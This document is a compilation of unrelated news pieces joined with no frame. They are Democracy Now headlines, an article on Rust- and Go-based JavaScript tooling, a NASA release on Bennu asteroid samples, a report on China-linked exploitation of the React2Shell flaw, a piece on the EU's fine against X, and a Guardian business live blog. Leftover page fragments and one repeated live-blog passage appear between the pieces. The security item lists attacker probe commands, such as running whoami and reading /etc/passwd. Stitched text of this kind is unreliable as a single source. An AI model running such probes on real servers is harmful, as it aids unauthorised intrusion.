In New Jersey, protesters picketed this morning outside a Jersey City warehouse that is used to transport military cargo to Israel. A recent report by the Palestinian Youth Movement and Progressive International found the warehouse handles over 1,000 tons of Israel-bound military cargo every week, including thousands of MK-84 2,000-pound bombs that have been used to level Gaza.
Dec 05, 2025
The U.S. Supreme Court has cleared the way for Texas to use a new congressional map designed to help Republicans pick up as many as five seats next year. A lower court had previously ruled the redistricting plan was unconstitutional because it would likely dilute the political power of Black and Latino voters. Liberal Supreme Court Justice Elena Kagan wrote in her dissent, “This court’s stay ensures that many Texas citizens, for no good reason, will be placed in electoral districts because of their race. And that result, as this court has pronounced year in and year out, is a violation of the constitution.”
Dec 05, 2025
The FBI has arrested a 30-year-old man from Virginia for allegedly planting pipe bombs near the Republican and Democratic National Committee headquarters in January 2021 — on the night before the January 6 insurrection at the U.S. Capitol. The suspect, Brian Cole, is expected to appear in court today.
Dec 05, 2025
The Justice Department has asked a judge to rejail a participant in the January 6 insurrection who had been pardoned by President Trump. The Justice Department made the request after the man, Taylor Taranto, showed up near the home of Democratic Congressmember Jamie Raskin, who served on the January 6 House Select Committee. Security has been increased for Raskin. In October, Taranto was sentenced to time served for making a threat near the home of former President Obama.
Dec 05, 2025
A federal grand jury in Virginia has declined a second attempt by the Justice Department to indict New York Attorney General Letitia James on charges that she lied in her mortgage application. In a statement, Letitia James wrote, “As I have said from the start, the charges against me are baseless. It is time for this unchecked weaponization of our justice system to stop.” It’s the latest defeat to President Trump’s campaign of retribution against his political enemies. The Trump administration is reportedly considering a third attempt to obtain an indictment against James.
Dec 05, 2025
Image Credit: New Orleans City Council
In New Orleans, about 30 activists were ejected from a City Council meeting Thursday after calling for ” ICE -free zones” and asking local leaders to do more to protect immigrants. During a public comment period, members of the public went to the microphone one by one and were cut off when it became clear they wanted to speak on immigration, which wasn’t on the formal agenda.
Brittany Cary: “And I’m asking City Council for ICE -free zones. Make all city-owned property ICE -free zones, and prohibit ICE and DHS from using city property to stage their operations. No collaboration with ICE . City Council must pass ordinances that codify noncollaboration” —
Chair : “Ma’am?”
Brittany Cary: — “between the city of New Orleans and ICE , including all of its offices and” —
Chair : “As I stated previously, that is not germane. Thank you for your comments.”
The protests came as the Border Patrol announced a surge of more than 200 federal immigration agents into New Orleans, which the agency is calling “Operation Catahoula Crunch.” They aim to make 5,000 arrests over two months. We’ll go to New Orleans later in the broadcast.
Dec 05, 2025
Honduran presidential candidate Salvador Nasralla has alleged fraud after his conservative rival Nasry Asfura regained the lead, as election officials continue to tally up votes from Sunday’s election. Nasralla also accused President Trump of interfering in the race by publicly backing Asfura. Some election officials have also publicly criticized the election process. On Thursday, Marlon Ochoa, who serves on Honduras’s National Electoral Council, decried what she called an electoral “coup.” She said, “I believe there is unanimity among the Honduran people that we are perhaps in the least transparent election in our democratic history.”
Dec 05, 2025
President Trump welcomed the leaders of the Democratic Republic of Congo and Rwanda to Washington, D.C., Thursday for the signing of an agreement aimed at ending decades of conflict in the eastern DRC . Trump also announced the U.S. had agreed to bilateral deals that will open the African nations’ reserves of rare earth elements and other minerals to U.S. companies. The signing ceremony was held in the newly renamed Donald J. Trump Institute of Peace.
Dec 05, 2025
During Thursday’s event, Trump struggled to keep his eyes open. This follows other recent public appearances where Trump appeared to fall asleep at times. And once again, Trump was spotted wearing bandages on his right hand, which appeared bruised and swollen. That fueled further speculation about the president’s health. On Monday, the White House said the results from Trump’s recent MRI exam were “perfectly normal,” after Trump was unable to tell reporters aboard Air Force One what part of his body was scanned.
Reporter : “What part of your body was the MRI looking at?”
President Donald Trump : “I have no idea. It was just an MRI . What part of the body? It wasn’t the brain, because I took a cognitive test, and I aced it. I got a perfect mark, which you would be incapable of doing. Goodbye, everybody. You. too.”
Dec 05, 2025
In business news, Netflix has announced it will buy Warner Bros. in a deal worth at least $72 billion. The deal could reshape the entertainment and media industry, as it will give Netflix control of Warner’s movie and TV studios, as well as the HBO Max streaming service.
Dec 05, 2025
Image Credit: X/@FightForAUnion
In labor news, a dozen striking Starbucks workers were arrested in New York City Thursday as they blocked the doors to the Empire State Building, where Starbucks has a corporate office. Starbucks workers at over 100 stores are on strike.
Dec 05, 2025
A University of California student has been ordered to serve 90 days in jail for breaking into a Sonoma County poultry slaughterhouse and freeing four chickens. Twenty-three-year-old Zoe Rosenberg of Berkeley received the sentence on Wednesday, after a jury convicted her in October of felony conspiracy and three misdemeanor counts. She was ordered to pay more than $100,000 to Petaluma Poultry, which is owned by the agribusiness giant Perdue Farms. Rosenberg’s supporters with the group Direct Action Everywhere say the chickens she rescued were worth $24; they’re reportedly alive and well at a sanctuary for rescued farm animals. Rosenberg told supporters her action was prompted by investigations that found routine violations of California’s animal cruelty laws at Petaluma Poultry slaughterhouses.
Zoe Rosenberg : “We found that there were dead birds among the living, that the air quality was so poor that chickens were struggling to breathe. I myself was struggling to breathe even with a KN95 mask as I investigated this facility. … And we have been calling on the California attorney general to take action, because the Sonoma County District Attorney’s Office has made it abundantly clear that they do not care about these animals whatsoever, that they care far more about the profits of Perdue, a company that makes over $10 billion a year on the backs of these animals.”
Dec 05, 2025
The Trump administration has ended a policy granting visitors free access to national parks on the Juneteenth and Martin Luther King Jr. Day holidays. Instead, the 116 parks that charge entrance fees will now waive admission charges on June 14 — President Trump’s birthday.
The original content of this program is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License . Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.
We rely on contributions from our viewers and listeners to do our work.
Please do your part today.
Over the last couple of years, we've witnessed a remarkable shift in the JavaScript ecosystem, as many popular developer tools have been rewritten in systems programming languages like Rust, Go, and Zig.
This transition has delivered dramatic performance improvements and other innovations that are reshaping how developers build JavaScript-backed applications.
In this article, we'll explore the driving forces behind this revolution, its implications for the wider ecosystem, and some of the most impactful projects leading the charge.
The shift toward building JavaScript tooling in systems languages is a response to real, mounting pressure in the ecosystem. While JavaScript engines have become remarkably fast over the years, the language itself wasn't designed for CPU-heavy workloads.
Modern JavaScript applications aren't just a few scripts anymore — they're sprawling codebases with thousands of dependencies, complex module graphs, and extensive build pipelines.
JavaScript-based tools that were once "good enough" now struggle to keep up, leading to sluggish build times, laggy editor experiences, and frustratingly slow feedback loops.
That's where languages like Rust and Go come in. They offer native performance, better memory management, and efficient concurrency — all of which translate into tooling that's not just faster, but more reliable and scalable.
Rust, in particular, with its seemingly cult-like following, has become the language of choice for much of this new wave. Its growing popularity has inspired a new generation of developers who care deeply about correctness, speed, and user experience. This has created a virtuous cycle where we get more tools and faster innovation.
All of this points to a broader realization in the JavaScript world: if we want tooling that scales with the demands of modern development, we have to look beyond JavaScript itself.
Let's look at some of the most influential and promising tools redefining the JavaScript developer experience: SWC, ESBuild, BiomeJS, Oxc, FNM/Volta, and TypeScript in Go.
SWC was among the first major JavaScript tools written in a language other than JavaScript itself (Rust), thus establishing a pattern that many others would follow.
At its core, it provides a high-performance platform for JavaScript/TypeScript transpilation, bundling, minification, and transformation through WebAssembly.
It has been largely successful in its goal of serving as a drop-in replacement for Babel, delivering transpilation speeds up to 20x faster while maintaining broad compatibility with most Babel configurations.
At a time when most developer tools were still being written in JavaScript, the idea of using systems languages like Go or Rust was considered more of an experiment than a trend.
But ESBuild changed that. In many ways, it sparked a broader wave of interest in building faster, lower-level tools that could dramatically improve the developer experience.
Created by Evan Wallace (former CTO of Figma), ESBuild was purpose-built to replace legacy bundlers like Webpack and Rollup with a much faster, simpler alternative. It achieves 10–100x faster performance in tasks like bundling, minification, and transpilation due to its Go-backed architecture.
Its speed, minimal configuration, and modern architecture have since influenced a generation of tools and helped shift the expectations around what JavaScript tooling should feel like, and for this reason, it remains the most adopted non-JavaScript tool to date, with over 50 million weekly downloads on NPM.
BiomeJS is an ambitious Rust-based project that combines code formatting and linting into a single high-performance JavaScript toolchain.
Originally a fork of the now defunct Rome project , BiomeJS delivers significant performance improvements over its entrenched predecessors:
BiomeJS simplifies the development workflow by consolidating these functions into a unified configuration system, eliminating the need to manage separate tools with overlapping functionality.
Though it's still catching up to its more established counterparts in language support and extensibility, it is an increasingly attractive option for anyone seeking better performance and simpler tooling.
A newer entrant to the field, Oxc is a collection of Rust-based JavaScript tools focusing on linting, formatting, and transforming JavaScript/TypeScript code.
It is part of the VoidZero project founded by Evan You (creator of Vue.js and Vite), and aims to be the backbone for the next-generation of JavaScript tooling.
Oxc's headline features include:
oxlint has been a massive win for us at Shopify. Our previous linting setup took 75 minutes to run, so we were fanning it out across 40+ workers in CI. By comparison, oxlint takes around 10 seconds to lint the same codebase on a single worker, and the output is easier to interpret. We even caught a few bugs that were hidden or skipped by our old setup when we migrated!
— Jason Miller , creator of Preact
Modern Node.js version management has greatly improved with tools like Fast Node Manager (fnm) and Volta , which are compelling alternatives to NVM . Another option is Mise , which supports Node.js along with many other development tools.
These Rust-based tools offer significantly faster shell initialization times and full cross-platform support with a much smaller memory footprint.
They address long-standing pain points in NVM, such as sluggish startup and lack of Windows compatibility, while adding conveniences like per-project version switching and seamless global package management.
Perhaps the most surprising development in recent months is Microsoft's work on porting TypeScript's compiler to Go .
While it's still in active development, preliminary benchmarks already show remarkable improvements in build times (~10x for VS Code's codebase), editor startup speeds, and memory usage.
This native port addresses TypeScript's scaling challenges in large codebases, where developers previously had to compromise between snappy editor performance and rich type feedback.
While some viewed the choice of Go over Rust as a missed opportunity, given the latter's dominance in modern JavaScript tooling, the rationale behind this decision aligns well with the project's practical goals:
The existing code base makes certain assumptions -- specifically, it assumes that there is automatic garbage collection -- and that pretty much limited our choices. That heavily ruled out Rust. I mean, in Rust you have memory management, but it's not automatic; you can get reference counting or whatever you could, but then, in addition to that, there's the borrow checker and the rather stringent constraints it puts on you around ownership of data structures. In particular, it effectively outlaws cyclic data structures, and all of our data structures are heavily cyclic.
— Anders Hejlsberg, creator of TypeScript
Microsoft intends to ship the Go-based implementation as TypeScript 7.0 in the coming months, but native previews are already available for experimentation.
Beyond the clear performance gains, the rise of native tooling for JavaScript brings deeper, ecosystem-wide implications.
With many established and upcoming tools now relying on entirely different runtimes and ecosystems, contributing becomes less accessible to the majority of JavaScript developers.
At the same time, this shift may influence the skill sets that developers choose to pursue in the first place. While not everyone needs to write systems-level code, understanding how these languages work and what they make possible will drive even more innovative tooling in the coming years.
Unsurprisingly, although learning Rust or Zig presents a steeper barrier to entry, developers overwhelmingly prefer faster tools (even if they're harder to contribute to).
One other subtle, but important, tradeoff is the loss of dogfooding, where tool creators stop using their own language to build their tools: which has historically helped developers in tune with the experience they're shaping.
Moving to a different implementation language can weaken that feedback loop, and while many projects are aware of this risk, the long-term impact of a lack of dogfooding remains an open question.
The tools covered here represent just a slice of the growing ecosystem of performance-focused, native-powered developer tools, and the momentum behind this new wave is undeniable.
Other notable efforts in this space include Turbopack and Turborepo (from Vercel), Dprint (a Prettier alternative), and even full-fledged runtimes like Bun (written in Zig) and Deno (Rust), which reimagine what's possible by rebuilding JavaScript infrastructure from the ground up.
Together, these tools reflect a broader shift in the JavaScript world that makes it clear that the future of JavaScript tooling is being written in Rust, Go, Zig, and beyond.
In this post, we explored several tools driving a new wave of performance and innovation across the JavaScript ecosystem.
The performance revolution in JavaScript tooling is a fascinating case study in ecosystem evolution.
Instead of being constrained by the limitations of JavaScript itself, the community has pragmatically embraced other languages to push the boundaries of what's possible.
Generated by cloudfront (CloudFront) Request ID: tSxqIFLwq-zGt0UwyLUOUN3IqzK_QOVkLmdXIVOTFHQKsoqQW7LIDA==
The asteroid Bennu continues to provide new clues to scientists’ biggest questions about the formation of the early solar system and the origins of life. As part of the ongoing study of pristine samples delivered to Earth by NASA’s OSIRIS-REx (Origins, Spectral Interpretation, Resource Identification, and Security-Regolith Explorer) spacecraft, three new papers published Tuesday by the journals Nature Geosciences and Nature Astronomy present remarkable discoveries: sugars essential for biology, a gum-like substance not seen before in astromaterials, and an unexpectedly high abundance of dust produced by supernova explosions.
Sugars essential to life
Scientists led by Yoshihiro Furukawa of Tohoku University in Japan found sugars essential for biology on Earth in the Bennu samples, detailing their findings in the journal Nature Geoscience . The five-carbon sugar ribose and, for the first time in an extraterrestrial sample, six-carbon glucose were found. Although these sugars are not evidence of life, their detection, along with previous detections of amino acids, nucleobases, and carboxylic acids in Bennu samples, show building blocks of biological molecules were widespread throughout the solar system.
For life on Earth, the sugars deoxyribose and ribose are key building blocks of DNA and RNA, respectively. DNA is the primary carrier of genetic information in cells. RNA performs numerous functions, and life as we know it could not exist without it. Ribose in RNA is used in the molecule’s sugar-phosphate “backbone” that connects a string of information-carrying nucleobases.
“All five nucleobases used to construct both DNA and RNA, along with phosphates, have already been found in the Bennu samples brought to Earth by OSIRIS-REx,” said Furukawa. “The new discovery of ribose means that all of the components to form the molecule RNA are present in Bennu.”
The discovery of ribose in asteroid samples is not a complete surprise. Ribose has previously been found in two meteorites recovered on Earth. What is important about the Bennu samples is that researchers did not find deoxyribose. If Bennu is any indication, this means ribose may have been more common than deoxyribose in environments of the early solar system.
Researchers think the presence of ribose and lack of deoxyribose supports the “RNA world” hypothesis, where the first forms of life relied on RNA as the primary molecule to store information and to drive chemical reactions necessary for survival.
“Present day life is based on a complex system organized primarily by three types of functional biopolymers: DNA, RNA, and proteins,” explains Furukawa. “However, early life may have been simpler. RNA is the leading candidate for the first functional biopolymer because it can store genetic information and catalyze many biological reactions.”
The Bennu samples also contained one of the most common forms of “food” (or energy) used by life on Earth, the sugar glucose, which is the first evidence that an important energy source for life as we know it was also present in the early solar system.
Mysterious, ancient ‘gum’
A second paper, in the journal Nature Astronomy led by Scott Sandford at NASA’s Ames Research Center in California’s Silicon Valley and Zack Gainsforth of the University of California, Berkeley, reveals a gum-like material in the Bennu samples never seen before in space rocks – something that could have helped set the stage on Earth for the ingredients of life to emerge. The surprising substance was likely formed in the early days of the solar system, as Bennu’s young parent asteroid warmed.
Once soft and flexible, but since hardened, this ancient “space gum” consists of polymer-like materials extremely rich in nitrogen and oxygen. Such complex molecules could have provided some of the chemical precursors that helped trigger life on Earth, and finding them in the pristine samples from Bennu is important for scientists studying how life began and whether it exists beyond our planet.
Scott SandFord
Astrophysicist, NASA's Ames Research Center
Bennu’s ancestral asteroid formed from materials in the solar nebula – the rotating cloud of gas and dust that gave rise to the solar system – and contained a variety of minerals and ices. As the asteroid began to warm, due to natural radiation, a compound called carbamate formed through a process involving ammonia and carbon dioxide. Carbamate is water soluble, but it survived long enough to polymerize, reacting with itself and other molecules to form larger and more complex chains impervious to water. This suggests that it formed before the parent body warmed enough to become a watery environment.
“With this strange substance, we’re looking at, quite possibly, one of the earliest alterations of materials that occurred in this rock,” said Sandford. “On this primitive asteroid that formed in the early days of the solar system, we’re looking at events near the beginning of the beginning.”
Using an infrared microscope, Sandford’s team selected unusual, carbon-rich grains containing abundant nitrogen and oxygen. They then began what Sandford calls “blacksmithing at the molecular level,” using the Molecular Foundry at Lawrence Berkeley National Laboratory (Berkeley Lab) in Berkeley, California. Applying ultra-thin layers of platinum, they reinforced a particle, welded on a tungsten needle to lift the tiny grain, and shaved the fragment down using a focused beam of charged particles.
When the particle was a thousand times thinner than a human hair, they analyzed its composition via electron microscopy at the Molecular Foundry and X-ray spectroscopy at Berkeley Lab’s Advanced Light Source. The ALS’s high spatial resolution and sensitive X-ray beams enabled unprecedented chemical analysis.
“We knew we had something remarkable the instant the images started to appear on the monitor,” said Gainsforth. “It was like nothing we had ever seen, and for months we were consumed by data and theories as we attempted to understand just what it was and how it could have come into existence.”
The team conducted a slew of experiments to examine the material’s characteristics. As the details emerged, the evidence suggested the strange substance had been deposited in layers on grains of ice and minerals present in the asteroid.
It was also flexible – a pliable material, similar to used gum or even a soft plastic. Indeed, during their work with the samples, researchers noticed the strange material was bendy and dimpled when pressure was applied. The stuff was translucent, and exposure to radiation made it brittle, like a lawn chair left too many seasons in the sun.
“Looking at its chemical makeup, we see the same kinds of chemical groups that occur in polyurethane on Earth,” said Sandford, “making this material from Bennu something akin to a ‘space plastic.’”
The ancient asteroid stuff isn’t simply polyurethane, though, which is an orderly polymer. This one has more “random, hodgepodge connections and a composition of elements that differs from particle to particle,” said Sandford. But the comparison underscores the surprising nature of the organic material discovered in NASA’s asteroid samples, and the research team aims to study more of it.
By pursuing clues about what went on long ago, deep inside an asteroid, scientists can better understand the young solar system – revealing the precursors to and ingredients of life it already contained, and how far those raw materials may have been scattered, thanks to asteroids much like Bennu.
Abundant supernova dust
Another paper in the journal Nature Astronomy , led by Ann Nguyen of NASA’s Johnson Space Center in Houston, analyzed presolar grains – dust from stars predating our solar system – found in two different rock types in the Bennu samples to learn more about where its parent body formed and how it was altered by geologic processes. It is believed that presolar dust was generally well-mixed as our solar system formed. The samples had six-times the amount of supernova dust than any other studied astromaterial, suggesting the asteroid’s parent body formed in a region of the protoplanetary disk enriched in the dust of dying stars.
The study also reveals that, while Bennu’s parent asteroid experienced extensive alteration by fluids, there are still pockets of less-altered materials within the samples that offer insights into its origin.
“These fragments retain a higher abundance of organic matter and presolar silicate grains, which are known to be easily destroyed by aqueous alteration in asteroids,” said Nguyen. “Their preservation in the Bennu samples was a surprise and illustrates that some material escaped alteration in the parent body. Our study reveals the diversity of presolar materials that the parent accreted as it was forming.”
NASA’s Goddard Space Flight Center provided overall mission management, systems engineering, and the safety and mission assurance for OSIRIS-REx. Dante Lauretta of the University of Arizona, Tucson, is the principal investigator. The university leads the science team and the mission’s science observation planning and data processing. Lockheed Martin Space in Littleton, Colorado, built the spacecraft and provided flight operations. Goddard and KinetX Aerospace were responsible for navigating the OSIRIS-REx spacecraft. Curation for OSIRIS-REx takes place at NASA’s Johnson Space Center in Houston. International partnerships on this mission include the OSIRIS-REx Laser Altimeter instrument from CSA (Canadian Space Agency) and asteroid sample science collaboration with JAXA’s (Japan Aerospace Exploration Agency’s) Hayabusa2 mission. OSIRIS-REx is the third mission in NASA’s New Frontiers Program, managed by NASA’s Marshall Space Flight Center in Huntsville, Alabama, for the agency’s Science Mission Directorate in Washington.
For more information on the OSIRIS-REx mission, visit:
https://www.nasa.gov/osiris-rex
Karen Fox / Molly Wasser
Headquarters, Washington
202-285-5155 / 240-419-1732
karen.c.fox@nasa.gov
/
molly.l.wasser@nasa.gov
Multiple China-linked threat actors began exploiting the React2Shell vulnerability (CVE-2025-55182) affecting React and Next.js just hours after the max-severity issue was disclosed.
React2Shell is an insecure deserialization vulnerability in the React Server Components (RSC) 'Flight' protocol. Exploiting it does not require authentication and allows remote execution of JavaScript code in the server's context.
For the Next.js framework, there is the identifier CVE-2025-66478, but the tracking number was rejected in the National Vulnerability Database's CVE list as a duplicate of CVE-2025-55182.
The security issue is easy to leverage, and several proof-of-concept (PoC) exploits have already been published, increasing the risk of related threat activity.
The vulnerability spans several versions of the widely used library, potentially exposing thousands of dependent projects. Wiz researchers say that 39% of the cloud environments they can observe are susceptible to React2Shell attacks.
React and Next.js have released security updates, but the issue is trivially exploitable without authentication and in the default configuration.
A report from Amazon Web Services (AWS) warns that the Earth Lamia and Jackpot Panda threat actors linked to China started to exploit React2Shell almost immediately after the public disclosure.
"Within hours of the public disclosure of CVE-2025-55182 (React2Shell) on December 3, 2025, Amazon threat intelligence teams observed active exploitation attempts by multiple China state-nexus threat groups, including Earth Lamia and Jackpot Panda," reads the AWS report .
AWS's honeypots also caught activity not attributed to any known clusters, but which still originates from China-based infrastructure.
Many of the attacking clusters share the same anonymization infrastructure, which further complicates individualized tracking and specific attribution.
Regarding the two identified threat groups, Earth Lamia focuses on exploiting web application vulnerabilities.
Typical targets include entities in the financial services, logistics, retail, IT companies, universities, and government sectors across Latin America, the Middle East, and Southeast Asia.
Jackpot Panda targets are usually located in East and Southeast Asia, and its attacks are aimed at collecting intelligence on corruption and domestic security.
Lachlan Davidson, the researcher who discovered and reported React2Shell, warned about fake exploits circulating online. However, exploits confirmed as valid by Rapid7 researcher Stephen Fewer and Elastic Security's Joe Desimone have appeared on GitHub.
The attacks that AWS observed leverage a mix of public exploits, including broken ones, along with iterative manual testing and real-time troubleshooting against targeted environments.
The observed activity includes repeated attempts with different payloads, Linux command execution ( whoami , id ), attempts to create files ( /tmp/pwned.txt ), and attempts to read ' /etc/passwd/ .'
"This behavior demonstrates that threat actors aren't just running automated scans, but are actively debugging and refining their exploitation techniques against live targets," comment AWS researchers.
Attack surface management (ASM) platform Assetnote has released a React2Shell scanner on GitHub that can be used to determine if an environment is vulnerable to React2Shell.
Broken IAM isn't just an IT problem - the impact ripples across your whole business.
This practical guide covers why traditional IAM practices fail to keep up with modern demands, examples of what "good" IAM looks like, and a simple checklist for building a scalable strategy.
Elon Musk’s social media platform, X, has been fined €120m (£105m) after it was found in breach of new EU digital laws, in a ruling likely to put the European Commission on a collision course with the US billionaire and potentially Donald Trump.
The breaches, under consideration for two years, included what the EU said was a “deceptive” blue tick verification badge given to users and the lack of transparency of the platform’s advertising.
The commission rules require tech companies to provide a public list of advertisers to ensure the company’s structures guard against illegal scams, fake advertisements and coordinated campaigns in the context of political elections.
In a third breach, the EU also concluded that X had failed to provide the required access to public data available to researchers, who typically keep tabs on contentious issues such as political content.
The ruling by the European Commission brings to a close part of an investigation that started two years ago.
The commission said on Friday it had found X in breach of transparency obligations under the Digital Services Act (DSA), in the first ruling against the company since the laws regulating the content of social media and large tech platforms came into force in 2023.
In December 2023, the commission opened formal proceedings to assess whether X may have breached the DSA in areas linked to the dissemination of illegal content and the effectiveness of the measures taken to combat information manipulation, for which the investigation continues.
Under the DSA, X can be fined up to 6% of its worldwide revenue, which was estimated to be between $2.5bn (£1.9bn) and $2.7bn in 2024.
Three other investigations remain, two of which relate to the content and the algorithms promoting content that changed after Musk bought Twitter in October 2022 and rebranded it X.
The commission continues to investigate whether there have been breaches of laws prohibiting incitement to violence or terrorism.
It is also looking into the mechanism for users to flag and report what they believe is illegal content.
Senior officials said the fine broke down into three sections: €45m for introducing a “verification” blue tick that users could buy, leaving others unable to determine the authenticity of account holders; €35m for breaches of ad regulations; and €40m for data access breaches in relation to research.
Before Musk took over Twitter, blue ticks were only awarded to verifiable account holders, including politicians, celebrities, public bodies and verified journalists in mainstream media and established new media, such as bloggers and YouTubers. After the takeover, users who subscribed to X Premium were then eligible for blue tick status .
Henna Virkkunen, who is the executive vice-president at the European Commission responsible for tech regulation, said: “With the DSA’s first non-compliance decision, we are holding X responsible for undermining users’ rights and evading accountability.
“Deceiving users with blue checkmarks, obscuring information on ads and shutting out researchers have no place online in the EU.”
The ruling risks enraging Trump’s administration. Last week the US commerce secretary, Howard Lutnick, said the EU must consider its tech regulations in order to get 50% tariffs on steel reduced.
after newsletter promotion
His threats were branded “blackmail” by Teresa Ribera, the EU commissioner in charge of Europe’s green transition and antitrust enforcement.
Senior EU officials said the ruling was independent of any pleadings by the US delegation in Brussels last week to meet trade ministers. They said the EU retained its “sovereign right” to regulate US tech companies, with 25 businesses including non-US companies such as TikTok coming under the DSA.
Musk – who is on a path to become the world’s first trillionaire – has 90 days to come up with an “action plan” to respond to the fine but ultimately he is also free to appeal against any EU ruling, as others, such as Apple, have done in the past, taking their case to the European court of justice.
At the same time, the EU has announced it has secured commitments from TikTok to provide advertising repositories to address the commission concerns raised in May about transparency.
The DSA requires platforms to maintain an accessible and searchable repository of the ads running on their services to allow researchers and representatives of civil society “to detect scams, advertisements for illegal or age-inappropriate”.
Senior officials said the phenomenon of fake political adverts or ads with fake celebrities cannot be studied unless the social media companies stick to the rules.
X has been approached for comment. The EU said the company had been informed of the decision.
Technical problems at internet infrastructure provider Cloudflare today have taken a host of websites offline this morning.
Cloudflare said shortly after 9am UK time that it “is investigating issues with Cloudflare Dashboard and related APIs [application programming interfaces – used when apps exchange data with each other].
Cloudflare has also reported it has implemented a potential fix to the issue and is monitoring the results.
But the outage has affected a number of websites and platforms, with reports of problems accessing LinkedIn, X, Canva – and even the DownDetector site used to monitor online service issues.
Last month, an outage at Cloudflare made many websites inaccessible for about three hours.
Key events
Cloudflare: this was not an attack
Edinburgh Airport suspends all flights after IT issue with air traffic control
Global websites down as Cloudflare investigates fresh issues
World food prices fall for third month in a row
European shares higher ahead of US PCE inflation report
Ocado shares jump 11% after agreeing $350m payment from Kroger
House prices predicted to rise in 2026, after budget uncertainty
Halifax: a clear North/South divide on house price changes
Introduction: UK house prices stagnated in November, weak retail spending too
Jake Moore , global cybersecurity adviser at ESET , has summed up the problem:
“If a major provider like Cloudflare goes down for any reason, thousands of websites instantly become unreachable.
“The problems often lie with the fact we are using an old network to direct internet users around the world to websites but it simply highlights there is one huge single point of failure in this legacy design.”
The Metro newspaper reports that shopping sites wer affected by the Cloudflare IT problems too – such as Shopify, Etsy, Wayfair, and H&M.
H&M’s website is slow to load right now, but the other three seem to be working…
Today’s Cloudflare outage is likely to intensify concerns that internet users are relying on too few technology providers.
Tim Wright, technology partner at Fladgate , explains:
“Cloudflare’s latest outage is another reminder that much of the internet runs through just a few hands. Businesses betting on “always-on” cloud resilience are discovering its single points of failure. Repeated disruptions will draw tougher scrutiny from regulators given DORA, NIS2, and the UK’s emerging operational resilience regimes.
Dependence on a small set of intermediaries may be efficient but poses a structural risk the digital economy cannot ignore. We can expect regulators to probe the concentration of critical functions in the cloud and edge layers — while businesses rethink whether convenience has quietly outpaced control.”
Cloudflare’s System Status page shows that the problem that knocked many websites offline has been resolved.
Cloudflare insists the problem was not a cyber attack; instead, it appears to have been caused by a deliberate change made by its firewall handles data requests, to fix a security vulnerability.
Cloudflare says:
This incident has been resolved.
A change made to how Cloudflare’s Web Application Firewall parses requests caused Cloudflare’s network to be unavailable for several minutes this morning. This was not an attack; the change was deployed by our team to help mitigate the industry-wide vulnerability disclosed this week in React Server Components. We will share more information as we have it today.
An IT issue affecting air traffic control has forced Edinburgh Airport to halt all flights today.
Edinburgh Airport said in a statement:
“No flights are currently operating from Edinburgh Airport.
“Teams are working on the issue and will resolve as soon as possible.”
The Airport’s departure page is showing eight flights delayed and five cancelled, but passengers for many other flights are being told to go to the gate.
Reports of problems at Cloudflare peaked at just after 9am UK time:
Online video conferencing service Zoom, and Transport for London’s website (used for travel information in the capital), are among the sites hit by the Cloudflare outage.
Technical problems at internet infrastructure provider Cloudflare today have taken a host of websites offline this morning.
Cloudflare said shortly after 9am UK time that it “is investigating issues with Cloudflare Dashboard and related APIs [application programming interfaces – used when apps exchange data with each other].
Cloudflare has also reported it has implemented a potential fix to the issue and is monitoring the results.
But the outage has affected a number of websites and platforms, with reports of problems accessing LinkedIn, X, Canva – and even the DownDetector site used to monitor online service issues.
Last month, an outage at Cloudflare made many websites inaccessible for about three hours.
In a separate cereal supply and demand report, the FAO raised its global cereal production forecast for 2025 to a record 3.003 billion metric tons.
That’s up from 2.990 billion tons projected last month, mainly due to increased estimates for wheat output.
The FAO’s forecast for world cereal stocks at the end of the 2025/26 season has also been revised up to a record 925.5 million tons, reflecting expectations of expanded wheat stocks in China and India as well as higher coarse grain stocks in exporting countries.
Global food prices have fallen for the third month running.
The UN’s Food Price Index, which tracks a basket of food commodities, dropped by 1.2% in November, thanks to a drop in the cost of dairy products, meat, sugar and vegetable oils.
That could help to push down inflation, if these reductions are passed onto consumers.
However, cereal prices rose by 1.8% last month, due to “potential Chinese interest in supplies from the United States of America, concerns over continuing hostilities in the Black Sea region, and expectations of reduced plantings in the Russian Federation”, the UN’s Food and Agriculture Organisation reports.
Vegetable oil prices fell by 2.6% in the month, to a five-month low, due to prices of palm, rapeseed and sunflower oils.
Meat prices dropped by 0.8%, driven by lower pig and poultry meat prices and the the removal of tariffs on beef imports into the US.
Dairy prices fell by 3.1% in November, thanks to rising milk production and abundant export supplies in key producing regions, supported by ample butter and skim milk powder inventories in the European Union and seasonally higher output in New Zealand.
Sugar prices dropped by 5.9% in the month, and were almost 30% lower than a year ago., as expectations of ample global sugar supplies in the current season pushed down prices. Strong production in Brazil’s key southern growing regions, a good early season start to India’s harvest and favourable crop prospects in Thailand all contributed.
European stock markets are ending the week on the front foot.
The main European indices are a little higher this morning; Germany’s DAX is up 0.55%, France’s CAC 40 is 0.3% higher, and the UK’s FTSE 100 has risen by 0.14%.
Investors are waiting for new US inflation data later today (1.30pm UK time), which could influence interest rate expectations ahead of next week’s US Federal Reserve meeting.
Kyle Rodda, senior financial market analyst at capital . com, says:
Risk assets are cautiously edging higher to round out the week, with US PCE Index data in focus this afternoon.
Ultimately, the markets appear to be looking for a signal that it’s all clear to keep moving higher again. That signal could come from data. But given the lack of it between now and the middle of next week, it’s more likely to come from the FOMC decision.
The current implied probabilities of a cut are 87%, according to FedWatch – swaps markets suggest a little higher. The markets won’t just want to see a cut delivered but also some dovish enough language and forecasts about the prospect of future cuts. Another hawkish cut, like that which was seen in October, could upset the apple cart, if it were to occur.
Nevertheless, European stocks have run with a broadly positive lead-in from Asian markets, with US futures also pointing higher
Mark Sweney
Warner Bros Discovery has entered exclusive talks to sell its streaming and Hollywood studio business to Netflix, a move that would dramatically change the established film and TV landscape.
Netflix is in competition with Paramount Skydance and Comcast, which owns assets including Universal Studios and Sky, to buy the owner of the Hollywood studio Warner Bros , HBO and the HBO Max streaming service.
Netflix is offering a $5bn (£3.7bn) breakup fee if the deal fails to gain regulatory approval in the US, according to Bloomberg, which first reported the exclusive talks.
Shares in Ocado have jumped by over 10% at the start of trading, after it agreed a compensation deal with US grocer Kroger.
Ocado is to receive a one-off $350m cash payment from Kroger , which decided last month to close three robotic warehouses which use the UK company’s high-tech equipment, in Maryland, Wisconsin, and Florida.
That decision, announced in mid-November , had knocked 17% off Ocado’s shares.
This morning, though, they’ve jumped to the top of the FTSE 250 index, up 11.5% to 206p.
Ocado had previously said it expected to receive more than $250m in compensation from Kroger .
